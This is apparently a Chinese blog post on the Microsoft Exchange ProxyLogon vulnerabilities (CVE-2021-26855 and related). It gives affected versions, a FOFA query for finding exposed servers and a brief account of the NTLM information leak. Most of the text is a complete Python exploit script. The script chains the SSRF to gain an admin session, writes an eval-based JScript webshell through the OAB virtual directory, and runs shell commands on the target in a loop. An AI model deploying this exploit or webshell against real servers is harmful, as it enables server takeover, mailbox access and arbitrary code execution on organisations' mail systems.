Microsoft Exchange 远程命令执行 CVE-2021-26855/26857/26858/27065

gclome

原文链接：Microsoft Exchange 远程命令执行 CVE-2021-26855/26857/26858/27065

一、漏洞描述
Microsoft Exchange Server 是个消息与协作系统。Exchange Server可以被用来构架应用于企业、学校的邮件系统或免费邮件系统。2021年03月03日微软官方披露多个Exchange高危漏洞：
CVE-2021-26855
Exchange服务器端请求伪造漏洞。利用此漏洞的攻击者能够以Exchange Server发送HTTP请求，扫描内网，获取Exchange用户信息。
CVE-2021-26857
Exchange反序列化漏洞。该漏洞需要管理员权限，攻击者通过构造恶意请求，触发反序列化漏洞，在服务器上执行恶意代码。
CVE-2021-26858/CVE-2021-27065
Exchange中身份验证后的任意文件写入漏洞。攻击者可以通过CVE-2021-26855的ssrf漏洞获取到的Exchange administrator凭证，构造恶意请求，在系统上写入任意文件。

二、漏洞影响
Exchange 2013 Versions < 15.00.1497.012,
Exchange 2016 CU18 < 15.01.2106.013,
Exchange 2016 CU19 < 15.01.2176.009,
Exchange 2019 CU7 < 15.02.0721.013,
Exchange 2019 CU8 < 15.02.0792.010

三、漏洞复现
FOFA语句 ：icon_hash="1768726119"

4篇关于原理的参考文章
https://www.praetorian.com/blog/reproducing-proxylogon-exploit/
https://www.crowdstrike.com/blog ... -zero-day-exploits/
https://www.volexity.com/blog/20 ... ay-vulnerabilities/
https://www.microsoft.com/securi ... g-exchange-servers/
其中一次攻击中的日志
​
可以看到首先请求了 /rpc/  这个目录
根据网上公布的 POC与EXP，可以看到 NTML协商消息会返回我们NTML询问信息， 其中包含了 AV_PAIR结构，其中包含了 后端服务器名称与域名
​
base64解密其中的加密部分
​
再通过解包的方法转换其中的数据就可以得到完整的后端服务器名称与域名
​
后面的大家就参考文章和EXP来研究原理吧，几篇文章和EXP已经很完整了


四、漏洞POC
EXP根据推特和Github几个脚本更改 python2运行，报错就是没成功哈，一般成功是不会报错的默认打的邮箱为 administrator@xxx.xxx.cn(可以自行更改)webshell路径和脚本文件中更改运行的命令是 ping Dnslog证明漏洞存在(一些东西就大家自己看看脚本改吧~)
​

1. #!/usr/bin/python2
   
2. # coding: UTF-8
   
3. 
   
4. import re
   
5. import sys
   
6. import json
   
7. import string
   
8. import requests
   
9. from urllib import urlencode
   
10. from tld import get_fld
    
11. from struct import unpack
    
12. from base64 import b64encode, b64decode
    
13. from requests.packages.urllib3.exceptions import InsecureRequestWarning
    
14. 
    
15. 
    
16. def title():
    
17.     print('+---------WgpSec狼组安全团队-------------')
    
18.     print('+  \033[34mPOC_Des: http://wiki.peiqi.tech                                   \033[0m')
    
19.     print('+  \033[34mGithub : https://github.com/PeiQi0                                 \033[0m')
    
20.     print('+  \033[34m公众号 : PeiQi文库                                                \033[0m')
    
21.     print('+  \033[34mVersion: Microsoft Exchang 多个版本                                \033[0m')
    
22.     print('+  \033[36m使用格式:  python poc.py                                           \033[0m')
    
23.     print('+  \033[36mUrl         >>> mail.xxx.org                                       \033[0m')
    
24.     print('+  \033[36mEmail       >>> Administrator@根域名  (默认)                        \033[0m')
    
25.     print('+------------------------------------------')
    
26. 
    
27. def _unpack_str(byte_string):
    
28.     return byte_string.decode('UTF-8').replace('\x00', '')
    
29. 
    
30. def _unpack_int(format, data):
    
31.     return unpack(format, data)[0]
    
32. 
    
33. def parse_challenge(Negotiate_base64_decode):
    
34.     target_info_field = Negotiate_base64_decode[40:48]
    
35.     target_info_len = _unpack_int('H', target_info_field[0:2])
    
36.     target_info_offset = _unpack_int('I', target_info_field[4:8])
    
37. 
    
38.     target_info_bytes = Negotiate_base64_decode[target_info_offset:target_info_offset + target_info_len]
    
39. 
    
40.     domain_name = ''
    
41.     computer_name = ''
    
42.     info_offset = 0
    
43.     while info_offset < len(target_info_bytes):
    
44.         av_id = _unpack_int('H', target_info_bytes[info_offset:info_offset + 2])
    
45.         av_len = _unpack_int('H', target_info_bytes[info_offset + 2:info_offset + 4])
    
46.         av_value = target_info_bytes[info_offset + 4:info_offset + 4 + av_len]
    
47. 
    
48.         info_offset = info_offset + 4 + av_len
    
49.         if av_id == 2:    # MsvAvDnsDomainName
    
50.             domain_name = _unpack_str(av_value)
    
51.         elif av_id == 3:  # MsvAvDnsComputerName
    
52.             computer_name = _unpack_str(av_value)
    
53. 
    
54.     if domain_name and computer_name:
    
55.         return domain_name, computer_name
    
56.     else:
    
57.         print("\033[31m[x] 计算机名称或域名称获取失败")
    
58.         sys.exit(0)
    
59. 
    
60. 
    
61. def POC_1(target_url, Email):
    
62.     print("\033[32m[o] 正在获取 计算机名称和域名称.....\033[0m")
    
63.     ntlm_type1 = (
    
64.         'NTLMSSP\x00'  # NTLMSSp签名
    
65.         '\x01\x00\x00\x00'  # 信息类型
    
66.         '\x97\x82\x08\xe2'  # 标记
    
67.         '\x00\x00\x00\x00\x00\x00\x00\x00'  # 域名称字符
    
68.         '\x00\x00\x00\x00\x00\x00\x00\x00'  # 工作字符
    
69.         '\x0a\x00\xba\x47\x00\x00\x00\x0f'  # 系统版本
    
70.     )
    
71.     headers = {
    
72.         'Authorization': 'Negotiate {}'.format(b64encode(ntlm_type1))
    
73.     }
    
74.     basic_url = 'https://{}/rpc/'.format(target_url)
    
75.     requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    
76.     response = requests.get(url=basic_url, headers=headers, verify=False)
    
77.     if response.status_code == 401:
    
78.         Negotiate_base64_encode = response.headers['WWW-Authenticate']
    
79.         Negotiate_base64_decode = re.search('Negotiate ([A-Za-z0-9/+=]+)', Negotiate_base64_encode).group(1)
    
80.         domain_name, computer_name = parse_challenge(b64decode(Negotiate_base64_decode))
    
81.         print("\033[32m[o] 计算机名称: {}\033[0m".format(computer_name))
    
82.         print("\033[32m[o] 域名称:    {}\033[0m".format(domain_name))
    
83.         POC_2(target_url, Email, computer_name)
    
84.     else:
    
85.         print("\033[31m[x] 获取失败")
    
86.         sys.exit(0)
    
87. 
    
88. def POC_2(target_url, Email, computer_name):
    
89.     payload = '''
    
90. <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
    
91.     <Request>
    
92.          <EMailAddress>%s</EMailAddress>
    
93.         <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
    
94.     </Request>
    
95. </Autodiscover>
    
96.     ''' % Email
    
97.     vuln_url = '/autodiscover/autodiscover.xml'
    
98.     headers = {
    
99.         'User-Agent': 'ExchangeServicesClient/0.0.0.0',
    
100.         'Content-Type': 'text/xml',
     
101.         'Cookie': 'X-BEResource=a]@{}:444{}?#~1941962753'.format(computer_name, vuln_url),
     
102.         'msExchLogonMailbox': 'S-1-5-20'
     
103.     }
     
104.     url = "https://{}/ecp/PeiQi.js".format(target_url)
     
105.     requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
     
106.     response = requests.post(url, headers=headers, data=payload, verify=False, allow_redirects=False)
     
107.     LegacyDN = re.findall(r'<LegacyDN>(.*?)</LegacyDN>', response.text)[0]
     
108.     print("\033[32m[o] LegacyDN: {}\033[0m".format(LegacyDN))
     
109.    
     
110.     vuln_url = '/mapi/emsmdb/'
     
111.     headers = {
     
112.         'X-Clientapplication': 'Outlook/15.0.4815.1002',
     
113.         'X-Requestid': 'x',
     
114.         'X-Requesttype': 'Connect',
     
115.         'Cookie': 'X-BEResource=a]@{}:444{}?#~1941962753'.format(computer_name, vuln_url),
     
116.         'Content-Type': 'application/mapi-http',
     
117.         'msExchLogonMailbox': 'S-1-5-20',
     
118.     }
     
119.     payload = LegacyDN + '\x00\x00\x00\x00\x00\x20\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00'
     
120.     url = "https://{}/ecp/PeiQi.js".format(target_url)
     
121.     requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
     
122.     response = requests.post(url, headers=headers, data=payload, verify=False, allow_redirects=False)
     
123.     SID = re.search('with SID ([S\-0-9]+) ', response.content).group(1)
     
124.     print("\033[32m[o] SID: {}\033[0m".format(SID))
     
125.    
     
126.     vuln_url = '/ecp/proxyLogon.ecp'
     
127.     payload = '<r at="NTLM" ln="%s"><s t="0">%s</s></r>' % (Email.split('@')[0], SID)
     
128.     headers = {
     
129.         'X-Clientapplication': 'Outlook/15.0.4815.1002',
     
130.         'X-Requestid': 'x',
     
131.         'X-Requesttype': 'Connect',
     
132.         'Cookie': 'X-BEResource=a]@{}:444{}?#~1941962753'.format(computer_name, vuln_url),
     
133.         'Content-Type': 'application/json',
     
134.         'msExchLogonMailbox': 'S-1-5-20',
     
135.     }
     
136.     url = "https://{}/ecp/PeiQi.js".format(target_url)
     
137.     requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
     
138.     response = requests.post(url, headers=headers, data=payload, verify=False, allow_redirects=False)
     
139.     session_id = response.cookies.get('ASP.NET_SessionId')
     
140.     canary     = response.cookies.get('msExchEcpCanary')
     
141.     print("\033[32m[o] Session_id: {}\033[0m".format(session_id))
     
142.     print("\033[32m[o] Canary    : {}\033[0m".format(canary))
     
143.    
     
144.     extra_cookies = [
     
145.         'ASP.NET_SessionId='+session_id,
     
146.         'msExchEcpCanary='+canary
     
147.     ]
     
148.     vuln_url = '/ecp/DDI/DDIService.svc/GetObject'
     
149.     qs = urlencode({
     
150.         'schema': 'OABVirtualDirectory',
     
151.         'msExchEcpCanary': canary
     
152.     })
     
153.     headers = {
     
154.         'X-Clientapplication': 'Outlook/15.0.4815.1002',
     
155.         'X-Requestid': 'x',
     
156.         'X-Requesttype': 'Connect',
     
157.         'Cookie': 'X-BEResource=a]@{}:444{}?{}#~1941962753;ASP.NET_SessionId={};msExchEcpCanary={}'.format(computer_name, vuln_url, qs, session_id, canary),
     
158.         'Content-Type': 'application/json',
     
159.         'msExchLogonMailbox': 'S-1-5-20',
     
160.     }
     
161.     url = "https://{}/ecp/PeiQi.js".format(target_url)
     
162.     requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
     
163.     response = requests.post(url, headers=headers, data='', verify=False, allow_redirects=False)
     
164.     identity = response.json()['d']['Output'][0]['Identity']
     
165.     print("\033[32m[o] OAB Name: {}\033[0m".format(identity['DisplayName']))
     
166.     print("\033[32m[o] OAB ID: {}\033[0m".format(identity['RawIdentity']))
     
167.    
     
168.     FILE_PATH = 'C:\\inetpub\\wwwroot\\aspnet_client\\PeiQi.aspx'
     
169.     FILE_DATA = '<script language="JScript" runat="server">function Page_Load(){eval(Request["PeiQi"],"unsafe");}</script>'
     
170.    
     
171.     vuln_url = '/ecp/DDI/DDIService.svc/SetObject'
     
172.     qs = urlencode({
     
173.         'schema': 'OABVirtualDirectory',
     
174.         'msExchEcpCanary': canary
     
175.     })
     
176.     payload = json.dumps({
     
177.         'identity': {
     
178.             '__type': 'Identity:ECP',
     
179.             'DisplayName': identity['DisplayName'],
     
180.             'RawIdentity': identity['RawIdentity']
     
181.         },
     
182.         'properties': {
     
183.             'Parameters': {
     
184.                 '__type': 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',
     
185.                 'ExternalUrl': 'http://f/' + FILE_DATA
     
186.             }
     
187.         }
     
188.     })
     
189.     headers = {
     
190.         'X-Clientapplication': 'Outlook/15.0.4815.1002',
     
191.         'X-Requestid': 'x',
     
192.         'X-Requesttype': 'Connect',
     
193.         'Cookie': 'X-BEResource=a]@{}:444{}?{}#~1941962753;ASP.NET_SessionId={};msExchEcpCanary={}'.format(computer_name, vuln_url, qs, session_id, canary),
     
194.         'Content-Type': 'application/json',
     
195.         'msExchLogonMailbox': 'S-1-5-20',
     
196.     }
     
197.     url = "https://{}/ecp/PeiQi.js".format(target_url)
     
198.     requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
     
199.     response = requests.post(url, headers=headers, data=payload, verify=False, allow_redirects=False)
     
200.     if response.status_code == 200:
     
201.         print("\033[32m[o] 通过OAB设置Webshell成功\033[0m")
     
202.    
     
203.     vuln_url = "/ecp/DDI/DDIService.svc/SetObject"
     
204.     qs = urlencode({
     
205.         'schema': 'ResetOABVirtualDirectory',
     
206.         'msExchEcpCanary': canary
     
207.     })
     
208.     payload = json.dumps({
     
209.         'identity': {
     
210.             '__type': 'Identity:ECP',
     
211.             'DisplayName': identity['DisplayName'],
     
212.             'RawIdentity': identity['RawIdentity']
     
213.         },
     
214.         'properties': {
     
215.             'Parameters': {
     
216.                 '__type': 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',
     
217.                 'FilePathName': FILE_PATH
     
218.             }
     
219.         }
     
220.     })
     
221.     headers = {
     
222.         'X-Clientapplication': 'Outlook/15.0.4815.1002',
     
223.         'X-Requestid': 'x',
     
224.         'X-Requesttype': 'Connect',
     
225.         'Cookie': 'X-BEResource=a]@{}:444{}?{}#~1941962753;ASP.NET_SessionId={};msExchEcpCanary={}'.format(computer_name, vuln_url, qs, session_id, canary),
     
226.         'Content-Type': 'application/json',
     
227.         'msExchLogonMailbox': 'S-1-5-20',
     
228.     }
     
229.     url = "https://{}/ecp/PeiQi.js".format(target_url)
     
230.     requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
     
231.     response = requests.post(url, headers=headers, data=payload, verify=False, allow_redirects=False)
     
232.     if response.status_code == 200:
     
233.         print("\033[32m[o] 正在尝试写入Webshell\033[0m")
     
234.         
     
235.     vuln_url = "/ecp/DDI/DDIService.svc/SetObject"   
     
236.     qs = urlencode({
     
237.         'schema': 'OABVirtualDirectory',
     
238.         'msExchEcpCanary': canary
     
239.     })
     
240.     payload = json.dumps({
     
241.         'identity': {
     
242.             '__type': 'Identity:ECP',
     
243.             'DisplayName': identity['DisplayName'],
     
244.             'RawIdentity': identity['RawIdentity']
     
245.         },
     
246.         'properties': {
     
247.             'Parameters': {
     
248.                 '__type': 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',
     
249.                 'ExternalUrl': ''
     
250.             }
     
251.         }
     
252.     })
     
253.     headers = {
     
254.         'X-Clientapplication': 'Outlook/15.0.4815.1002',
     
255.         'X-Requestid': 'x',
     
256.         'X-Requesttype': 'Connect',
     
257.         'Cookie': 'X-BEResource=a]@{}:444{}?{}#~1941962753;ASP.NET_SessionId={};msExchEcpCanary={}'.format(computer_name, vuln_url, qs, session_id, canary),
     
258.         'Content-Type': 'application/json',
     
259.         'msExchLogonMailbox': 'S-1-5-20',
     
260.     }
     
261.     url = "https://{}/ecp/PeiQi.js".format(target_url)
     
262.     requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
     
263.     response = requests.post(url, headers=headers, data=payload, verify=False, allow_redirects=False)
     
264.     print("\033[32m[o] 清除 OAB\033[0m")
     
265.     print("\033[32m[o] 正在验证 Webshell是否上传成功..........\033[0m")
     
266.     webshell_url = "https://" + target_url + "/aspnet_client/PeiQi.aspx"
     
267.     requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
     
268.     response = requests.get(url=webshell_url, verify=False, allow_redirects=False)
     
269.     if response.status_code == 200 and "Name" in response.text:
     
270.         print("\033[32m[o] 上传 Webshll成功, 地址为:{}\033[0m".format("https://" + target_url + "/aspnet_client/PeiQi.aspx"))
     
271.         print("\033[32m[o] 响应为:\n{}\033[0m".format(response.text))
     
272.         while True:
     
273.             Dnslog = str(raw_input("\033[35mDnslog >>> \033[0m"))
     
274.             requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
     
275.             Dnslog_url = "https://" + target_url + '/aspnet_client/PeiQi.aspx?PeiQi=new ActiveXObject("WSCRIPT.SHELL").Run("ping {}");'.format(Dnslog)
     
276.             response = requests.get(url=Dnslog_url, verify=False, allow_redirects=False)
     
277.             print("\033[32m[o] 执行命令 ping {}\033[0m".format(Dnslog))
     
278.             print("\033[32m[o] 请检查 Dndslog 响应\033[0m")
     
279.    
     
280.         
     
281.    
     
282. 
     
283. if __name__ == '__main__':
     
284.     title()
     
285.     target_url = str(raw_input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
     
286.     Email = "Administrator@{}".format(get_fld("https://" + target_url))
     
287.     print("\033[32m[o] 请求地址:{}，使用的邮箱:{}\033[0m".format(target_url, Email))
     
288.     POC_1(target_url, Email)

复制代码